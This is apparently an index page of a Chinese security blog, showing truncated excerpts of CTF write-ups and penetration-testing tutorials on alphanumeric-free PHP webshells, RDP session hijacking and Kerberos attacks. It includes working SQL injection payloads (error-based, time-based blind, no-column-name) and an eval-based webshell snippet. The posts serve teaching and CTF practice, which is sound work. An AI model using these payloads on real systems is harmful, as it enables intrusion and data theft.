WHOAMI's Blog

[toc] Ad Network 题目要求我们不断跟进重定向跳转 1337 次 进入题目： Enter the topic: 查看源码发现一个接口 /adnetwork： Look at the source code and find a /adnetwork: 访问该接口并抓包发现是不断的重定向： Visit the /adnetwork and capture packets and find that it is a constant redirection: 写个脚本不断跟进每一次跳转，跳转 1337 次即可得到 flag： Write a script to continuously follow up every jump, jump 1337 times to get the flag: 12345678910111213import requestsurl = "http://adnetwork-cybrics2021.ctf.su/adnetwork"r = requests.get(url=url,allow_re ...

[toc] 前言无字母数字 Webshell 是个老生常谈的东西了，之前打 CTF 的时候也经常会遇到，每次都让我头大。由于一直没有去系统的研究过这个东西，今天就好好学习学习。 所谓无字母数字 Webshell，其基本原型就是对以下代码的绕过： 1234<?phpif(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']);} 这段代码限制了我们传入 shell 参数中的值不能存在字母和数字。 下面我们来说说答题的思路： 首先，代码确实是限制了我们的 Webshell 不能出现任何字母和数字，但是并没有限制除了字母和数字以外的其他字符。所以我们的思路是，将非字母数字的字符经过各种转换，最后能构造出 a-z0-9 中的任意一个字符。然后再利用 PHP 允许动态函数执行的特点，拼接处一个函数名，比如 “assert”、”system”、”file_put_contents”、”call_user_func” 等危险函数然后动 ...

[toc] 前言可惜啊，强网的时候正在某地 hvv 错过了。只能在赵师傅的平台上复现一下了。 托纳多进入题目，一个登录框： Insert 注入点的 SQL 注入在注册处存在 Sql 注入，单引号闭合，过滤了 <、>、=、like、tables、coluns 等字符和关键字。猜测注册逻辑的 Sql 语句如下： 1insert into users (username, password) values ('$username', '$password'); 首先尝试报错注入： 12username: 0' or updatexml(1,concat(0x7c,database(),0x7c),1) or '0password: 123456 失败，任何回显，然后尝试时间盲注，成功则有延迟，失败则弹窗 “this username had been used”： 12username: 0' or if(ascii(substr((select database()),1,1))in(97),sleep( ...

[toc] 前言远程桌面在内网渗透中可以说是再常见不过了，在渗透测试中，拿下一台主机后有时候会选择开 3389 进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。对远程桌面的利用姿势有很多，本篇文章中我们来学习一下 RDP 会话劫持的相关利用姿势。 RDP 劫持的原理 系统管理员和用户通常可以通过 RDP 远程桌面登录指定服务器 3389 远程桌面，而攻击者可以通过可以特权提升至 SYSTEM 权限的用户，可以在不知道其他用户登录凭据的情况下，用来劫持其他用户的 RDP 会话，该漏洞在 2017 年由以色列安全研究员 Alexander Korznikov 在个人博客中披露。利用条件只需要获取机器 SYSTEM 权限执行 tscon 命令。 对于开启远程桌面服务的 Windows 系统，当有多个用户登录该系统时，会产生多个会话，如下图： 其中，管理员用户 Administrator 为本地登录，用户 bunny 为通过远程桌面服务（RDP）连接 3389 端口的远程桌面登录。接下来，如果用户 Administrator 想要切换至用户 bunny 的远程桌面，可通过右键— ...

[toc] 前言远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中，拿下一台主机后有时候会选择开 3389 进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面的利用不仅如此，本节我们便来初步汇总一下远程桌面在内网渗透中的各种利用姿势。 文中若有不当之处还请各位大佬多多点评 我的博客：https://whoamianony.top/ RDP 协议RDP，Remote Desktop Protocol，远程桌面协议，该协议是对国际电信联盟发布的一个国际标准的多通道会议协议T.120 的一个扩展。远程桌面协议让用户（客户端或称“本地电脑”）连上提供微软终端机服务的电脑（服务器端或称“远程电脑”）。大部分的 Windows、Linux、FreeBSD、Mac OS X 都有相应的客户端。远程桌面协议在服务端默认监听 TCP 3389 端口的数据。远程桌面协议为用户提供了通过网络连接远程登录到另一台计算机的图形界面。 RDP 服务的确定和启动RDP 服务的确定 注册表查询 通过以下命令查询注册表来查看 RDP 服务是否开启： 123REG QUERY " ...

[toc] 前言往期文章： 《内网渗透测试：Kerberos 协议与 Kerberos 认证原理》 《内网渗透测试：Kerberos 协议相关安全问题分析与利用》 在上一篇文章《内网渗透测试：Kerberos 协议相关安全问题分析与利用》中，我们详细介绍了多种基于 Kerberos 协议进行的攻击，本节我们再来对 Kerberoast 攻击做一下介绍。 文中若有不当之处还请各位大佬多多点评 我的博客：https://whoamianony.top/ Kerberos 是一种支持票证身份验证的安全协议。如果客户端计算机身份验证请求包含有效的用户凭据和 SPN，则 Kerberos 身份验证服务器将授予一个票证以响应该请求。然后，客户端计算机使用该票证来访问网络资源。 什么是 SPNSPN，ServicePrincipal Names，即服务主体名称，是服务实例（比如：HTTP、SMB、MySQL等服务）在使用 Kerberos 身份验证的网络上的唯一标识符，其由服务类、主机名和端口组成。Kerberos 认证过程使用 SPN 将服务实例与服务登录账户相关联，如果想使用 Kerb ...

杰克与肉丝开题即给源码： 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051<?phphighlight_file(__file__);class Jack{ private $action; function __set($a, $b) { $b->$a(); }}class Love { public $var; function __call($a,$b) { $rose = $this->var; call_user_func($rose); } private function action(){ echo "jack love rose"; }}class Titanic{ ...

[toc] 前言往期文章： 《内网渗透测试：Kerberos 协议与 Kerberos 认证原理》 在上一节中我们说到过，Kerberos 认证并不是天衣无缝的，这其中也会有各种漏洞能够被我们利用，比如我们常说的 MS14-068、黄金票据、白银票据等就是基于Kerberos协议进行攻击的。下面我们便详细的讲解一下 Kerberos 认证中的相关安全问题。 文中若有不当之处还请各位大佬多多点评 我的博客：https://whoamianony.top/ 黄金票据（Golden ticket）在 Windows 的 kerberos 认证过程中，Client 将自己的信息发送给 KDC，然后 KDC 使用 Krbtgt 用户的 NTLM 哈希作为密钥进行加密，生成 TGT。那么如果获取到了 Krbtgt 的 NTLM 哈希值，不就可以伪造任意的 TGT 了吗。因为 Krbtgt 只有域控制器上面才有，所以使用黄金凭据意味着你之前拿到过域控制器的权限，黄金凭据可以理解为一个后门。 利用 Krbtgt 的 Hash 值可以伪造生成任意的 TGT，能够绕过对任意用户的账号策略，让用户 ...

[toc] 前言如果你了解内网渗透，那么应该都对 IPC、黄金票据、白银票据、、PTT、PTK 这些老生常谈的词汇再熟悉不过了，对其利用也应该是了如指掌了吧。但是如果你对其背后的所使用的原理还不太了解的话，那么这篇（系列）文章你一定不能错过。 在本篇文章中，我们将对 Kerberos 协议与 Kerberos 认证原理分模块进行详细的讲解，为下篇文章中讲解 Kerberos 认证原理的安全问题做下铺垫。 文中若有不当之处，还请各位大佬师傅们多多点评。 我的博客：https://whoamianony.top/ Kerberos 协议Kerberos 协议是一种计算机网络授权协议，用来在非安全网络中，对个人通信以安全的手段进行身份认证。其设计目标是通过密钥系统为客户机与服务器应用程序提供强大的认证服务。该协议的认证过程的实现不依赖于主机操作系统的认证，无需基于主机地址的信任，不要求网络上所有主机的物理安全，并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下， Kerberos 作为一种可信任的第三方认证服务，是通过传统的密码技术（如：共享密钥）执行认证服务的。K ...

[toc] 前言感觉一晚上考完了高考，刚经历完一模二模三模的你还肝得动吗？ easy_sql经测试登录密码出存在 sql 注入： 1passwd=0')||extractvalue(1,concat(0x7c,(database()),0x7c))#&uname=123 之后用 sqlmap 跑出两个数据表 users、flag，并且过滤了 information，所以用为无列名注入，用 join…using 爆出字段名： 12345passwd=0')||extractvalue(1,concat(0x7c,(select * from (select * from flag join flag as a)b),0x7c))#&uname=123 // idpasswd=0')||extractvalue(1,concat(0x7c,(select * from (select * from flag join flag as a using(id))b),0x7c))#&uname=123 // nopasswd ...